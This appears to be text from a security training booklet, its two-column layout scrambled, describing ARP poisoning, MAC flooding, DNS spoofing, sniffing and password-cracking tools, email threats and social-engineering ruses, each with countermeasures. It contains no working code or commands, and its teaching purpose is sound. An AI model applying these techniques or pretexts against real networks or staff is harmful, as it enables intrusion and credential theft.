Address Resolution Protocol poisoning (ARP poisoning) is a form of attack using the ARP s command at the command line and appending the gate-
in which an attacker changes the Media Access Control (MAC) address and ways IP and MAC addresses. Doing so prevents a hacker from overwriting
attacks an Ethernet LAN by changing the target computers ARP cache with the ARP cache to perform ARP spoofing on the system but can be difficult
a forged ARP request and reply packets. This modifies the layer -Ethernet to manage in a large environment because of the number of systems. In an
MAC address into the hackers known MAC address to monitor it. Because enterprise environment, port-based security can be enabled on a switch to
the ARP replies are forged, the target computer unintentionally sends the allow only one MAC address per switch port.
frames to the hackers computer first instead of sending it to the original
destination. As a result, both the users data and privacy are compromised.
An effective ARP poisoning attempt is undetectable to the user. MAC FLOODING
In computer networking, MAC flooding is a technique employed to compro-
mise the security of network switches. Switches maintain a MAC Table that
ARP poisoning is also known as ARP cache poisoning or ARP poison
maps individual MAC addresses on the network to the physical ports on the
routing (APR).
switch.
ARP (Address Resolution Protocol) allows the network to translate IP ad-
dresses into MAC addresses. When one host using TCP/IP on a LAN tries to
contact another, it needs the MAC address or hardware address of the host
its trying to reach. It first looks in its ARP cache to see if it already has the
MAC address; if it doesnt, it broadcasts an ARP request asking, Who has
the IP address Im looking for? If the host that has that IP address hears the
ARP query, it responds with its own MAC address and a conversation can
begin using TCP/IP.

A hacker can also flood a switch with so much traffic that it stops operating For example, an attacker poisons the IP addresses DNS entries for a target
as a switch and instead reverts to acting as a hub, sending all traffic to all website on a given DNS server, replacing them with the IP address of a serv-
ports. This active sniffing attack allows the system with the sniffer to cap- er the hacker controls. The hacker then creates fake entries for files on this
ture all traffic on the network. server with names matching those on the target server. These files may con-
tain malicious content, such as a worm or a virus. A user whose computer
This type of attack is also known as CAM table overflow attack. Within
has referenced the poisoned DNS server is tricked into thinking the content
a very short time, the switchs MAC Address table is full with fake MAC
comes from the target server and unknowingly downloads malicious content.
address/port mappings. Switchs MAC address table has only a limited
amount of memory. The switch cannot save any more MAC address in its A spoofing attack can continue for a long period without being noticed. In
MAC Address table. fact, companies may never know of the security breach until the competitor
enters the market with a product of similar characteristics. The consequenc-
es of a spoofing attack would be that companies can destroy any opportuni-
DNS SPOOFING ty other companies have to create a competitive edge. The frightening thing,
in times when IP address management and security are the top concerns for
NS spoofing is a term used when a DNS server accepts and uses incorrect the high technology community, is that most top level business managers
information from a host that has no authority giving that information. DNS have not yet realized the financial and security risks associated with DNS
spoofing is in fact malicious cache poisoning where forged data is placed in spoofing.
the cache of the name servers. Spoofing attacks can cause serious security
problems for DNS servers vulnerable to such attacks, for example caus-
ing users to be directed to wrong Internet sites or e-mail being routed to
Tips for Preventing DNS Spoofing
non-authorized mail servers.
Maintain the DNS software Up-to-Date.
Allow updates and zone transfers from trusted sources.
aintain a Separate DNS server for public services and for internal
M
services.
se secure key for signing the updates received from other DNS serv-
U
er. This will avoid updates from un-trusted sources.
5. Sniffing Tools
1. Ettercap often accompanies Cain (third in our list). Ettercap is a free

and open source network security tool for man-in-the-middle attacks (MITM)
on LAN. The security tool can be used to analyse computer network protocols
within a security auditing context. Ettercap has four methods of functionality:
Security scanning by filtering IP-based packets, MAC-based: whereby pack-
ets are filtered based on MAC address, (this is useful for sniffing connections
through a gateway). ARP-based scanning by using ARP poisoning to sniff on
To perform a DNS attack, the attacker exploits a flaw in the DNS server a switched LAN between two hosts (known as full-duplex). Public ARP-based
software that can make it accept incorrect information. If the server doesnt functionality: Ettercap uses ARP poisoning to sniff on a switched LAN from a
correctly validate DNS responses to ensure that they come from an author- victim host to all other hosts (known as half-duplex).
itative source, the server ends up caching the incorrect entries locally and
serving them to users that make subsequent requests. This technique can
be used to replace arbitrary content for a set of victims with content of an 2. Wireshark Wireshark has been around for ages and is extremely
attackers choosing. popular. Wireshark allows the penetration tester to put a network interface
into a promiscuous mode and therefore see all traffic. This tool has many
features such as being able to capture data from live network connection or

read from a file that saved already-captured packets. Wireshark is able to randomly, set a MAC of another vendor, set another MAC of the same ven-
read data from a wide variety of networks, from Ethernet, IEEE 802.11, PPP dor, set a MAC of the same kind or even to display a vendor MAC list to
and even loopback. choose from.
3. Cain & Abel. This tool allows a penetration tester to recover various
types of passwords by sniffing the network and cracking encrypted pass-
11. WinDNSSpoof is a simple DNS ID spoofing tool for Windows. To use it
words using either a dictionary or brute-force attacks. The tool can also re-
on a switched network, you must be able to sniff traffic of the computer be-
cord VoIP conversations and has the ability to decode scrambled passwords,
ing attacked. Therefore, it may need to be used in conjunction with an ARP
discover Wi-Fi network keys and cached passwords. With the correct usage
spoofing or flooding tool.
and expertise, a penetration tester can also analyse routing protocols.
6. Sniffing Countermeasures
4. Ethereal is a freeware sniffer that can capture packets from a wired or
wireless LAN connection. The latest version has been renamed WireShark. The best security defence against a sniffer on the network is encryption.
Ethereal is a common and popular program because it is free but has some Although encryption wont prevent sniffing, it renders any data captured
drawbacks. An untrained user may find it difficult to write filters in Ethereal during the sniffing attack useless because a hacker cant interpret the in-
to capture only certain types of traffic. formation. Encryption such as AES and RC4 or RC5 can be utilized in VPN
technologies and is a common method to prevent sniffing on a network.
Using applications that encrypt the traffic, users can at least be moderately
5. EtherPeek is a great sniffer for wired networks with extensive filtering
reassured that their information will be safe from prying eyes. The detection
and TCP/IP conversation tracking capabilities. The latest version of Ether-
solution is to monitor ARP traffic on your network and detect when ARP en-
Peek has been renamed OmniPeek.
tries are being changed.
6. WinSniffer is an efficient password sniffer. It monitors incoming and

PASSWORD ATTACK
outgoing network traffic and decodes FTP, POP3, HTTP, ICQ, Simple Mail
Transfer Protocol (SMTP), Telnet, Internet Message Access Protocol (IMAP) Objective
and Network News Transfer Protocol (NNTP) usernames and passwords.
Introduction of Password Cracking
Attack methods
7. EtherFlood is used to flood an Ethernet switch with traffic to make it
revert to a hub. By doing this, a hacker is able to capture all traffic on the Password Cracking Tools
network rather than just traffic going to and from their system, as would be Web-Based Password Cracking
the case with a switch.
1. Introduction
A password is the secret word or phrase that is used for the authentication
8. Packet Crafter is a tool used to create custom TCP/IP/UDP packets. process in various applications. It is used to gain access to accounts and re-
The tool can change the source address of a packet to do IP spoofing and sources. A password protects our accounts or resources from unauthorized
can control IP flags such as checksums and TCP flags such as the state access.
flags, sequence numbers and ACK number.
What is Password Cracking?
Password cracking is the process of guessing or recovering a password from
9. SMAC is a tool to change the MAC address of a system. It lets a hack- stored locations or from data transmission system. It is used to get a pass-
er spoof a MAC address when performing an attack. word for unauthorized access or to recover a forgotten password. In penetra-
tion testing, it is used to check the security of an application.
10. MAC Changer is a tool used to spoof a MAC address on Unix. It can In recent years, computer programmers have been trying to create algo-
be used to set the network interface to a specific MAC address, set the MAC rithms for password cracking in less time. Most of the password cracking

tools try to login with every possible combination of words. If login is suc- Rainbow table attack
cessful, it means the password was found. If the password is strong enough
A rainbow table is a list of pre-computed hashes - the numerical value of an
with a combination of numbers, characters and special characters, this
encrypted password, used by most systems today - and thats the hashes of
cracking method may take hours to weeks or months.
all possible password combinations for any given hashing algorithm mind.
In the past few years, programmers have developed many password cracking The time it takes to crack a password using a rainbow table is reduced to
tools. Every tool has its own advantages and disadvantages. In this post, we the time it takes to look it up in the list.
are covering a few of the most popular password cracking tools.
Rats and Key loggers
Here are the most common password cracking techniques in use:
In keylogging or RAT the hacker sends key logger or rat
Dictionary attack to the victim. This allows hacker to monitor everything
victim does on his computer. Every keystroke is logged
This uses a simple file containing words that can be found in a dictionary. In
including passwords. Moreover hacker can even con-
other words, if you will excuse the pun, this attack uses exactly the kind of
trol the victims computer.
words that many people use as their password.
Countermeasure: Never login to your bank account
Dictionary attacks are only as good as the dictionary files you supply to your
from a cyber cafe or someone elses computer. If its
password-cracking program. You can easily spend days, even weeks, try-
important, use on-screen or virtual keyboard while
ing to crack passwords with a dictionary attack. If you dont set a time limit
tying the login. Use latest anti-virus software and keep
or similar expectation going in, youll likely find that dictionary cracking is
them updated.
often a mere exercise in futility. However, some special dictionaries have
common misspellings or alternative spellings of words, such as pa$$w0rd Guessing
(password) and 5ecur1ty (security).
It seems silly but this can easily help you to
Dictionary attacks quickly compare a set of known dictionary-type words get someones password within seconds. If
including many common passwords against a password database. This hacker knows you, he can use information he
database is a text file with hundreds if not thousands of dictionary words knows about you to guess your password. A
typically listed in alphabetical order. Hacker can also use combination of Social En-
gineering and Guessing to acquire your pass-
Brute force attack
word.
This method is similar to the dictio-
Even with all of the advanced programs, al-
nary attack but with the added bonus,
gorithms, and techniques computer scien-
for the hacker, of being able to de-
tists have come up with, sometimes the most
tect non-dictionary words by working
effective way of cracking a user password is
through all possible alpha-numeric
by using logic and/or trying commonly used
combinations from aaa1 to zzz10.
passwords. For many unknowledgeable users, passwords are more of an
Its not quick, provided your pass- annoyance than a security, and therefore they use passwords that can be
word is over a handful of characters easily remembered and thus easily guessed, such as:
long, but it will uncover your password
The word password
eventually. Brute force attacks can be
shortened by throwing additional computing horsepower, in terms of both The same as the user name
processing power - including harnessing the power of your video card GPU Name of the user
- and machine numbers, such as using distributed computing models and Birthdays or birth places
zombie botnets.
Relatives
Brute-force attacks can crack practically any password, given sufficient
Pets
time. Brute-force attacks try every combination of numbers, alphabets and
special characters until the password is discovered. Many password-crack- Favourite color, foods, places, etc.
ing utilities let you specify such testing criteria as the character sets, pass-
word length to try, and known characters (for a mask attack).

This method can be more time efficient than using a program, but obviously 2) It shows the saved password by selecting particular given option in left pan.
this method works best when the person recovering the password knows
the user. One other thing to keep in mind is that the average user does not
like coming up with multiple passwords, so if you can figure out one pass-
word for one area, you can usually gain access to most other password pro-
tected areas using the same password.
SOFTWARE USED FOR PASSWORD CRACKING
There are many password cracking software tools, but the most popular
are Cain and Abel, John the Ripper, Hydra, ElcomSoft and Lastbit. Most of
these packages employ a mixture of cracking strategies, with brute force and
dictionary attacks proving to be the most productive.
Demo of Cain & Abel Packet Sniffer, Cracker and Brute-Forcing Tool
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It
allows easy recovery of various kinds of passwords by sniffing the network,
cracking encrypted passwords using Dictionary, Brute-Force and Cryptanal-
ysis attacks, recording VoIP conversations, decoding scrambled passwords,
recovering wireless network keys, revealing password boxes, uncovering
cached passwords and analysing routing protocols. The program does not
exploit any software vulnerabilities or bugs that could not be fixed with a 2. The Network tab helps you view the browsers, the dial-in servers, the
little effort. It covers some security aspects/weakness present in protocols SQL servers. Time servers and others user in the network.
standards, authentication methods and caching mechanisms;
1. The Decoders tab allows you to decrypt protected documents, dialup

passwords, and wireless password.

3. There is a sniffer tab where you can capture the packet which is in 5. The Configuration dialog enables you to modify the ports, HTTP fields,
transit state and crack the password. trace routes and filters.
4. In cracker tab you can decode the LM Hash, NT Hash value by pass-
word attacking method like Dictionary, Brute force, Cryptanalysis attack
PASSWORD-CRACKING COUNTERMEASURES
The best password-cracking countermeasure is to implement strong pass-

words that are at least eight characters long and that include alphanumeric
characters. Usernames and passwords should be different, because many
usernames are transmitted in clear text. Complex passwords that require
uppercase, lowercase, and numbers or special characters are harder to
crack. You should also implement a strong authentication mechanism such
as Kerberos or tokens to protect passwords in transit.

Attack Characteristics Man-in-the- Man-in-the-middle attacks are used to intercept information passing
Brute force A brute force attack is a method of defeating a password by exhaustive- middle between two communication partners. Man-in-the-middle attacks are:
ly working through all possibilities in order to find the password. In a An attacker logically placed between the client and server. The
brute force attack, the attacker: client is fooled into authenticating to the attacker.
Captures some form of password caching. Both parties at the endpoints believe they are communicating
Attacks the cache file offline with a brute force attacker. directly with the other, while the attacker intercepts and/or
modifies the data in transit. The attacker then authenticates to
Dictionary A dictionary attack refers to the technique of trying to guess a password
the server using the intercepted credentials.
by running through a list of words from a dictionary. Often symbols
Commonly used to steal credit cards, online bank credentials,
and upper and lower case characters are substituted inside the diction-
as well as confidential personal and business information.
ary work. It contrasts to a brute force attack in which all possibilities are
tried. The dictionary attack works because users often choose easy-to-
Countermeasures for man-in-the-middle attacks are:
guess passwords. A strong password policy is the best defence against
Use encrypted communication protocols, such as IPSec.
dictionary attacks.
Use certificates.
Password sniffing Password sniffing is an attempt to intercept passwords passing over a Perform mutual authentication.
computer network. Typically, software programs are used to capture PKI
packets on the network. The attacker then analyses the packets to de-
Replay In a replay attack, an attacker intercepts and records messages. The cap-
termine which ones contain passwords. Encryption provides the best
tured traffic is used at another time to try and recreate authentication.
protection from sniffing attacks. Technologies such as SSL, SSH, and
Countermeasures for replay attacks are:
IPSEC provide a level of protection beyond traditional network layout
Packet time stamps.
and design countermeasures.
Packet sequencing.
Spoofing Spoofing is used to hide the true source of packets or redirect traffic to
Hijacking Hijacking is an attack in which the attacker steals an open and active
another location. The most common form of spoofing on a typical IP
communication session from a legitimate user (an extension of a man-
packet is modification of the source address. In this way, the correct
in-the-middle attack).
source device address is hidden. Spoofing attacks:
The attacker takes over the session and cuts off the original
Use modified source and/or destination addresses in packets.
source device.
Can include site spoofing that tricks users into revealing infor-
The TCP/IP session state is manipulated so that the attack-
mation.
er is able to insert alternate packets into the communication
stream.
Countermeasures to prevent spoofing are:
Implement firewall and router filters to prevent spoofed pack-
Countermeasures for hijacking are:
ets from crossing in to or out of your private secured network.
IPSec or other encryption protocols.
Filters will drop any packet suspected of being spoofed.
Certificate authentication.
Use certificates to prove identity.
Mutual authentication.
Use reverse DNS lookup to verify the source e-mail address.
Randomizing sequencing mechanisms.
Use encrypted communication protocols, such as IPSec.
Packet time stamps.
Ingress and egress filters are the most effective protection
Packet sequencing.
against IP packet spoofing. Ingress filters examine packets
coming into the network, while egress filters examine packets
going out of the network. These filters will examine packets
based on rules to identify any spoofed packets. Any packet
suspected of being spoofed on its way into or out of your net-
work will be dropped.

Authentication Attacks and Countermeasures ly configure authentication for both inbound and outbound mail. SMTP is
designed to be a mail relay system. This means it relays mail from sender
Authentication is the process of proving and validating identity. Authenti-
to intended recipient. However, you want to avoid turning your SMTP server
cated users have access to resources based on their identity. The following
into an open relay (also known as open relay agent or relay agent), which is
table lists common attacks directed at the authentication process.
an STMP server that does not authenticate senders before accepting and re-
Countermeasures for attacks on authentication are: laying mail. Open relays are prime targets for spammers because they allow
spammers to send out floods of emails by piggybacking on an insecure email
Implement a strong password policy. infrastructure.
Retain password history to prevent re-use.
Use of multifactor authentication. Understanding Email Security
Use strong sequence numbering systems. The first step in deploying email security is to recognize the vulnerabilities
Utilize timestamps on frames to defeat the replay attack. specific to email.
Audit for excessive failed logon attempts. Eavesdropping and Interception: The protocols used to support
email do not employ encryption. Thus, all messages are transmitted in the
Monitor the network or system for sniffing and password theft tools. form in which they are submitted to the email server, which is often plain
Implement account lockout to lock accounts when multiple incorrect pass- text. This makes interception and eavesdropping easy.
words are used. Malware Distribution: Email is the most common delivery mecha-
Suggestions for strengthening passwords are: nism for viruses, worms, Trojan horses, documents with destructive macros,
and other malicious code. Hackers with malicious intent can exploit your
Password must contain multiple character types: uppercase, lowercase, email client by distributing malware through email messages. The malware
numbers and special characters. includes viruses, worms, rootkits, Trojans, key loggers, spyware, and ad-
ware, to name a few types. The malware is distributed via an email attach-
Password length should be minimum 10 characters.
ment or sometimes by simply opening an email message. More often than
Use no part of a username or e-mail address. not, the mail message is disguised as a message from someone you know
when in reality; it is sent by the hacker.
Avoid dictionary, slang or acronyms.
Infecting your computer with malicious links: Here, the cyber
Change passwords every 30 days
attackers goal is for you to click on a link. However, instead of harvesting
your information, their goal is to infect your computer. If you click on the
link, you are directed to a website that silently launches an attack against
Managing Email Security your computer that if successful, will infect your system.
Email is one of the most widely and commonly used Internet services. The Phishing Attack: A phishing attack is generally not hazardous to the
email infrastructure employed on the Internet primarily consists of email inner workings of your PC however; it is designed to trick you into reveal-
servers using the Simple Mail Transfer Protocol (SMTP) to accept messages ing your personal information, passwords or bank account information. For
from clients, transport those messages to other servers, and deposit mes- example, if you use PayPal, the phisher sends you a message through email
sages into a users server-based inbox. In addition to email servers, the that looks like it came from PayPal. The message requests you to verify your
infrastructure includes email clients. Clients retrieve email from their serv- account information with PayPal to continue using your account. The mes-
er-based inboxes using the Post Office Protocol version 3 (POP3) or Internet sage proceeds to tell you that if you do not verify the information your ac-
Message Access Protocol (IMAP). Clients communicate with email servers count will be closed. Someone that is unaware of phishing scams easily gets
using SMTP. Sendmail is the most common SMTP server for Unix systems, tricked into revealing their account information. These types of messages are
Exchange is the most common SMTP server for Microsoft systems, and set up to look like the real deal.
GroupWise is the most common SMTP server for Novell systems. In addi-
Spoofing: Email offers little in the way of source verification. Spoofing
tion to these three popular products, numerous alternatives exist, but they
the source address of email is a simple process for even a novice attacker.
all share the same basic functionality and compliance with Internet email
Email headers can be modified at their source or at any point during transit.
standards. If you deploy an SMTP server, it is imperative that you proper-
Furthermore, it is also possible to deliver email directly to a users inbox on

an email server by directly connecting to the email servers SMTP port. And PEM: Privacy Enhanced Mail (PEM) is an email encryption mechanism
speaking of in-transit modification, there are no native integrity checks to that provides authentication, integrity, confidentiality and non-repudiation.
ensure that a message was not altered between its source and destination. PEM uses RSA, DES, and X.509.
In addition, email itself can be used as an attack mechanism.
PGP/GPG: Pretty Good Privacy/GNU Privacy Guard is a public-pri-
Denial of Service (DoS): A denial of service attack occurs when the vate key system that uses the RSA algorithm to encrypt emails. PGP is not
hacker sends multitudes of email messages to your email client in an effort a standard but rather an independently developed product that has wide
to block you from using your email client or crashing your computer alto- Internet grassroots support.
gether. In the case of an organization, a denial of service attack on email can
crash an entire network and prevent the users from responding to legitimate
traffic. This attack is often called mail-bombing or email flooding. The DoS Analyzing Email header
can be the result of storage capacity consumption or processing capability
utilization. Either way, the result is the same: legitimate messages cannot be The email header is the information that travels with every email. It contains
delivered. details about the sender, route and receiver. Email headers determine where
a message is sent, and records the specific path the message follows as it
Spamming: Unwanted email can be considered an attack. Sending passes through each mail server.
unwanted, inappropriate, or irrelevant messages is called spamming. Spam-
ming is often little more than a nuisance, but it does waste system resources You can easily read message headers by using an online tool such as
both locally and over the Internet. It is often difficult to stop spam because www.mxtoolbox.com/EmailHeaders.aspx
the source of the messages is usually spoofed.
https://toolbox.googleapps.com/apps/messageheader
Scams: These are attempts by criminals to defraud you. Classic ex- Or, if youd like to read a message header yourself, follow the path of a mes-
amples include notices that youve won the lottery, charities requesting sage chronologically by reading from the bottom of the header, to top.
donations after a recent disaster. A dignitary that needs to transfer millions
of dollars into your country and would like to pay you to help them with the Gmail
transfer. Dont be fooled, these are scams created by criminals who are after Log into Gmail.
your money.
Open the message.
Click the down arrow next to Reply, at the top-right of the message pane.
Email Security Solutions Select Show original.
Imposing security on email is possible, but the efforts should be in tune with
the value and confidentiality of the messages being exchanged. You can use
several protocols, services and solutions to add security to email without
requiring a complete overhaul of the entire Internet based SMTP infrastruc-
ture. These include S/MIME, MOSS, PEM, and PGP.
S/MIME: Secure Multipurpose Internet Mail Extensions (S/MIME)
offers authentication and privacy to email through public key encryption
and digital signatures. Authentication is provided through X.509 digital
certificates. Privacy is provided through the use of Public Key Cryptography
Standard (PKCS) encryption. Two types of messages can be formed using S/
MIME: signed messages and secured enveloped messages. A signed message
provides integrity and sender authentication. An enveloped message pro-
vides integrity, sender authentication, and confidentiality.
MOSS: MIME Object Security Services (MOSS) can provide authentic-
ity, confidentiality, integrity, and nonrepudiation for email messages. MOSS
employs Message Digest 2 (MD2) and MD5 algorithms; Rivest, Shamir, and
Adelman (RSA) public key; and Data Encryption Standard (DES) to provide
authentication and encryption services.

Reading Email Header
From: This displays who the message is from however, this can be
easily forged and can be the least reliable.
Subject: This is what the sender placed as a topic of the email con-
tent.
Date: This shows the date and time the email message was composed
To: This shows to whom the message was addressed, but may not
contain the recipients address.
Return-Path: The email address for return mail. This is the same as
Reply-To:.
Envelope-To: This header shows that this email was delivered to the
mailbox of a subscriber whose email address is for example: user@
example.com
Delivery Date: This shows the date and time at which the email was
received by email client.
Received
**The full headers will appear in a new window. he received is the most important part of the email header and is
T
usually the most reliable. It forms a list of all the servers/computers
For Yahoo
through which the message traveled in order to reach you
Log into Yahoo webmail.
The received lines are best read from bottom to top.
Open the message
That is, the first Received: line is your own system or mail server.
Click on More tab
Click Full Headers at the top of your message The last Received: line is where the mail originated.
Each mail system has its own style of Received: line.
A Received: line typically identifies the machine that received the
mail and the machine from which the mail was received.
Message-id: A unique string assigned by the mail system when the
message is first created. These can easily be forged.
Mime-Version: Multipurpose Internet Mail Extensions (MIME) is an
Internet standard that extends the format of email.
X-Spam-Level: Displays a spam score usually created by your service
or mail client.
Message Body: This is the actual content of the email itself, written
by the sender
Content-Type: Generally, this will tell you the format of the message,
such as html or plaintext.
X-Spam-Status: Displays a spam score created by your service or
** The full headers will appear above the message text mail client

Finding the Original Sender Statistics:
he easiest way for finding the original sender is by looking for the
T Distribution of organizations affected by phishing attacks, by category, 2015
X-Originating-IP header.
his header is important since it tells you the IP address of the com-
T
puter that had sent the email.
If you cannot find the X-Originating-IP header, then you will have to
sift through the Received headers to find the senders IP address.
nce the email senders IP address is found, you can search for it at
O
www.whois.sc.
By using these and other security mechanisms for email and communica-
tion transmissions, you can reduce or eliminate many of the security vul-
nerabilities of email. Digital signatures can help eliminate impersonation.
The encryption of messages reduces eavesdropping. And the use of email
filters keeps spamming and mail-bombing to a minimum. Blocking attach-
ments at the email gateway system on your network can ease the threats
from malicious attachments. You can have a 100 percent no-attachments
policy or block only those attachments that are known or suspected to be
malicious, such as attachments with extensions that are used for execut-
able and scripting files. If attachments are an essential part of your email
communications, youll need to train your users and your antivirus tools
for protection. Training users to avoid contact with suspicious or unexpect-
ed attachments greatly reduces the risk of malicious code transference via
email. Antivirus software is generally effective against known viruses, but it
offers little protection against new or unknown viruses.
Geography of Phishing Attack 2015:

Malicious Email attachments 2015:
Social engineering is a component of many, if not most, types of exploits.

Virus writers use social engineering tactics to persuade people to run mal-
ware-wrapped email attachments, phishers use social engineering to con-
vince people to divulge sensitive information and scare ware vendors use
social engineering to frighten people into running software that is useless at
best and dangerous at worst.
Another aspect of social engineering relies on peoples inability to keep up
with a culture that relies heavily on information technology. Social engi-
neers rely on the fact that people are not aware of the value of the informa-
tion they possess and are careless about protecting it. Frequently, social
engineers will search dumpsters for valuable information, memorize access
codes by looking over someones shoulder (shoulder surfing), or take advan-
tage of peoples natural inclination to choose passwords that are meaningful
to them but can be easily guessed.
Security experts propose that as our culture becomes more dependent on
information, social engineering will remain the greatest threat to any securi-
Social Engineering ty system. Prevention includes educating people about the value of informa-
tion, training them to protect it, and increasing peoples awareness of how
Objective social engineers operate.
Introduction Social engineering is a nontechnical method of breaking into a system or
Social Engineering methods for hacking network. Its the process of deceiving users of a system and convincing them
to give out information that can be used to defeat or bypass security mech-
Common Types of Attacks anisms. Social engineering is important to understand because hackers can
use it to attack the human element of a system and circumvent technical
Social-Engineering Countermeasures
security measures. This method can be used to gather information before or
during an attack.
Introduction
Social engineering is a term that describes a non-technical kind of intrusion SOCIAL ENGINEERING TERM
that relies heavily on human interaction and often involves tricking other
Social engineering is the use of influence and persuasion to deceive people
people to break normal security procedures.
for the purpose of obtaining information or persuading a victim to perform
A social engineer runs what used to be called a con game. For example, a some action. A social engineer commonly uses the telephone or Internet to
person using social engineering to break into a computer network might try trick people into revealing sensitive information or to get them to do some-
to gain the confidence of an authorized user and get them to reveal informa- thing that is against the security policies of the organization. By this meth-
tion that compromises the networks security. Social engineers often rely on od, social engineers exploit the natural tendency of a person to trust their
the natural helpfulness of people as well as on their weaknesses. word, rather than exploiting computer security holes. Its generally agreed
that users are the weak link in security; this principle is what makes social
engineering possible.

The following is an example of social engineering recounted by Kapil Rana, cur- Whos the supervisor on duty tonight? Oh, its Betty. Let me talk to Bet-
rently a security expert at Verisign, based on an actual workplace experience ty. [Hes transferred.] Hi Betty, having a bad day? No, why? Your sys-
with a previous employer. One morning a few years back, a group of strang- tems are down. She said, My systems arent down, were running fine. He
ers walked into a large shipping firm and walked out with access to the firms said, You better sign off. She signed off. He said, Now sign on again. She
entire corporate network. How did they do it? By obtaining small amounts of signed on again. He said, We didnt even show a blip, we show no change.
access, bit by bit, from a number of different employees in that firm. First, they He said, Sign off again. She did. Betty, Im going to have to sign on as you
did research about the company for two days before even attempting to set foot here to figure out whats happening with your ID. Let me have your user ID
on the premises. For example, they learned key employees names by calling and password. So this senior supervisor at the help desk tells him her user
HR. Next, they pretended to lose their key to the front door and a man let them ID and password. In a few minutes a hacker is able to get information that
in. Then they lost their identity badges when entering the third floor secured might have taken him days to get by capturing traffic and cracking the pass-
area, smiled, and a friendly employee opened the door for them. word. It is much easier to gain information by social engineering than by
technical methods. People are usually the weakest link in the security chain.
The strangers knew the CFO was out of town, so they were able to enter his
A successful defense depends on having good policies in place and teaching
office and obtain financial data off his unlocked computer. They dug through
employees to follow the policies. Social engineering is the hardest form of at-
the corporate trash, finding all kinds of useful documents. They asked a jan-
tack to defend against because a company cant protect itself with hardware
itor for a garbage pail in which to place their contents and carried all of this
or software alone.
data out of the building in their hands.
The strangers had studied the CFOs voice, so they were able to phone,
pretending to be the CFO in a rush, desperately in need of his network pass- COMMON TYPES OF ATTACKS
word. From there, they used regular technical hacking tools to gain su-
Social engineering can be broken into two common types:
per-user access into the system.
Human-based: Human-based social engineering refers to per-
In this case, the strangers were network consultants performing a security
son-to-person interaction to retrieve the desired information. An example is
audit for the CFO without any other employees knowledge. They were never
calling the help desk and trying to find out a password.
given any privileged information from the CFO but were able to obtain all the
access they wanted through social engineering. Computer-based: Computer-based social engineering refers to hav-
ing computer software that attempts to retrieve the desired information. An
The most dangerous part of social engineering is that companies with
example is sending a user an e-mail and asking them to reenter a password
authentication processes, firewalls, virtual private networks, and net-
in a web page to confirm it. This social-engineering attack is also known as
work-monitoring software are still wide open to attacks, because social engi-
phishing.
neering doesnt assault the security measures directly. Instead, a social-en-
gineering attack bypasses the security measures and goes after the human Well look at each of these more closely in the following sections.
element in an organization.
HUMAN-BASED SOCIAL ENGINEERING
Human-based social engineering techniques can be broadly categorized as
SOCIAL ENGINEERING METHODS FOR HACKING follows:
Social engineering includes the acquisition of sensitive information or inap- 1. Impersonating an employee or valid user: In this type of social-en-
propriate access privileges by an outsider, based on the building of inappro- gineering attack, the hacker pretends to be an employee or valid user on
priate trust relationships. The goal of a social engineer is to trick someone the system. A hacker can gain physical access by pretending to be a janitor,
into providing valuable information or access to that information. It preys employee, or contractor. Once inside the facility, the hacker gathers infor-
on qualities of human nature, such as the desire to be helpful, the tendency mation from trashcans, desktops, or computer systems.
to trust people, and the fear of getting in trouble. Hackers who are able to
blend in and appear to be a part of the organization are the most successful 2. Posing as an important user: In this type of attack, the hacker pre-
at social-engineering attacks. An example of the using the social engineering tends to be an important user such as an executive or high-level manager
is illustrated in the following example. who needs immediate assistance to gain access to a computer system or
files. The hacker uses intimidation so that a lower-level employee such as
The facilitator of a live Computer Security Institute demonstration showed a help-desk worker will assist them in gaining access to the system. Most
the vulnerability of help desks when he dialed up a phone company, got low-level employees wont question someone who appears to be in a position
transferred around and reached the help desk. of authority.

3. Using a third person: Using the third-person approach, a hacker pre- or PIN numbers. The user clicks the link in the e-mail and is redirected to a
tends to have permission from an authorized source to use a system. This fake website. The hacker is then able to capture this information and use it
attack is especially effective if the supposed authorized source is on vacation for financial gain or to perpetrate other attacks. E-mails that claim the send-
or cant be contacted for verification. ers have a great amount of money but need your help getting it out of the
country are examples of phishing attacks. These attacks prey on the com-
4. Calling technical support: Calling tech support for assistance is a
mon person and are aimed at getting them to provide bank account access
classic social-engineering technique. Help-desk and technical support per-
codes or other confidential information to the hacker.
sonnel are trained to help users, which makes them good prey for social-en-
gineering attacks. 2) On-Line Social Engineering: The Internet is fertile ground for social
engineers looking to harvest passwords. The primary weakness is that many
5. Shoulder surfing: Shoulder surfing is a technique of gathering pass-
users often repeat the use of one simple password on every account: Yahoo,
words by watching over a persons shoulder while they log in to the system.
Travelocity, and Gap.com, whatever. So once the hacker has one password,
A hacker can watch a valid user log in and then use that password to gain
he or she can probably get into multiple accounts. One way in which hack-
access to the system.
ers have been known to obtain this kind of password is through an on-line
6. Dumpster diving: Dumpster diving involves looking in the trash for form: they can send out some sort of sweepstakes information and ask the
information written on pieces of paper or computer printouts. The hacker user to put in a name (including e-mail address that way, she might even
can often find passwords, filenames, or other pieces of confidential informa- get that persons corporate account password as well) and password.
tion.
3) Another way hackers may obtain information on-line is by pretend-
7. Tailgating: Tailgating is when an unauthorized party follows an au- ing to be the network administrator, sending e-mail through the network
thorized party into an otherwise secure location, usually to steal valuable and asking for a users password. This type of social engineering attack
property or confidential information. This often involves subverting keycard doesnt generally work, because users are generally more aware of hackers
access to a secure building or area by quickly following behind an autho- when online, but it is something of which to take note. Furthermore, pop-
rized user and catching the door or other access mechanism before it closes. up windows can be installed by hackers to look like part of the network
and request that the user reenter his username and password to fix some
8. Pretexting: Pretexting is when one party lies to another to gain access sort of problem. At this point in time, most users should know not to send
to privileged data. For example, a Pretexting scam could involve an attacker passwords in clear text (if at all), but it never hurts to have an occasional
who pretends to need personal or financial data in order to confirm the iden- reminder of this simple security measure from the System Administrator.
tity of the recipient. Even better, sys admans might want to warn their users against disclosing
their passwords in any fashion other than a face-to-face conversation with a
staff member who is known to be authorized and trusted.
COMPUTER-BASED SOCIAL ENGINEERING
4) E-mail can also be used for more direct means of gaining access to a
Computer-based social engineering attacks can include the following: system. For instance, mail attachments sent from someone of authenticity
Mail/IM attachments: An attacker can send malicious attachments can carry viruses, worms and Trojan horses. A good example of this was an
to an innocent victim via mail/IM. AOL hack, documented by Vigilante: In that case, the hacker called AOLs
tech support and spoke with the support person for an hour. During the
Pop-up windows: Pop-up windows simulate an urgent condition on a conversation, the hacker mentioned that his car was for sale cheaply. The
users computer and request sensitive information to restore it to the normal tech supporter was interested, so the hacker sent an e-mail attachment
state. with a picture of the car. Instead of a car photo, the mail executed a back-
door exploit that opened a connection out from AOL through the firewall.
